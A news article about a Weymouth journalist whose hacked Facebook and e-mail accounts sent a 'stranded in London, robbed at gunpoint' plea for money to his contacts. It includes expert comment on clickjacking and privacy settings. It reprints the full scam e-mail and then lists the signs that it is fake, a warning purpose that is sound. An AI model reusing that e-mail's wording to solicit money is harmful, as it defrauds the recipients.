Victor DeRubeis didn’t know his Facebook page and e-mail account had been hacked until friends sent messages saying they were worried that he’d been robbed at gunpoint overseas. It didn’t take long for the freelance journalist and Weymouth resident to realize that his e-mail account had been hacked, and someone had sent messages to dozens of his friends trying to scam them out of money. Like thousands of other Web victims before him, his Internet life was no longer his own.
Victor DeRubeis didn’t know he’d been robbed at gunpoint in London until friends started text-messaging offers of help.
It didn’t take long for the freelance journalist to realize that his e-mail account had been hacked through his Facebook page. Like thousands of other Web victims before him, his Internet life was no longer his own.
“I’ve heard of it happening from other people, but this is the first time anything like this has happened to me,” the Weymouth, Mass., resident said Tuesday.
The e-mail, sent to dozens of people in DeRubeis’ address book, says he is “stuck in London with family right now, we came down here on family vacation, we were robbed, worse of it is that bags, cash and cards and our cell phone were stolen at a GUN POINT, and it's hard to get hold of a phone here in London.” The e-mail makes a plea for money to help return his family home.
His nasty surprise had a happy ending – his identity wasn’t stolen, and none of his friends lost money to the scam. Facebook shut down his page for two days and purged a program that had infiltrated his page.
But for all that, Internet privacy experts say DeRubeis may be no better protected today than he was Saturday because the way social network sites like Facebook run leave them chronically vulnerable.
At the Electronic Frontier Foundation, an Internet civil liberties and privacy advocacy site, senior technologist Peter Eckersley said any social site like Facebook is prone to hacking because “Like” and permission buttons and connections are such a basic part of how they operate.
“This is a well-understood problem,” he said. “It’s up to the Web sites to stop it from happening.”
While social network sites are vulnerable, Eckersley said, Google’s Gmail is comparatively secure.
Facebook didn’t tell DeRubeis exactly how the hackers got to his e-mail, but Eckersley thinks he knows.
A wave of “click-jacker” worms attacked Facebook last week. Click-jackers take advantage of the sites with sharing and permission options by creating a permission link that’s too small to see and moves under the Facebook user’s mouse cursor.
As a result, “you click the ‘OK’ on something you don’t even see,” Eckersley said.
DeRubeis suspected his trouble had something to do with a third-party site – in his case, a connection to DailyMile.com, a social site for fitness enthusiasts.
Soon after he posted an update Saturday afternoon, “I started getting text message and phone calls from people who said, ‘Are you in London?’” he said.
He quickly saw that the responses were coming from people on his e-mail account. He changed his password, sent out warning messages and then waited through “Facebook purgatory” for two days until his account was clear.
DeRubeis has no plans to take down his Facebook page, but he’s using more privacy settings than before.
Eckersley says the best thing most users can do is disable “instant personalization” programs, which allow freer use of personal information, and limit the amount of personal material that’s posted.
“Don’t put anything on Facebook (and other social sites) that you aren’t comfortable seeing published,” he said. “Security isn’t good enough to protect very private information, and probably won’t be in the future, so ... be cautious about how you use it.”
Lane Lambert may be reached at firstname.lastname@example.org.
This e-mail was sent by hackers to people in Victor DeRubeis' address book.
Subject: URGENT HELP!!!,
I'm sorry for this odd request because it might get to you too urgent but it's because of the situation of things right now, I'm stuck in London with family right now, we came down here on family vacation, we were robbed, worse of it is that bags, cash and cards and our cell phone were stolen at a GUN POINT,and it's hard to get hold of a phone here in London it's such a crazy experience for us, we need help flying back home, the authorities are not being 100% supportive but the good thing is we still have our passport but don't have enough money to get our flight ticket back home, please i need you to loan us some money, will pay you back as soon as we are back home, i promise.
It is easy to spot as a fake:Its phrasing is in the broken English typical of spam e-mails ("it might get to you too urgent but it's because of the situation of things right now"); The situation is implausible (he can't find a phone, but he can find a computer to send this e-mail? Robbers took everything except their passports?); It's not personalized (the e-mail includes general details but no specific details about the situation) It's obvious plea for cash instead of any other help ("please i need you to loan us some money")
If you receive an e-mail like this from someone you know, always be cautious and confirm whether it's fake or genuine.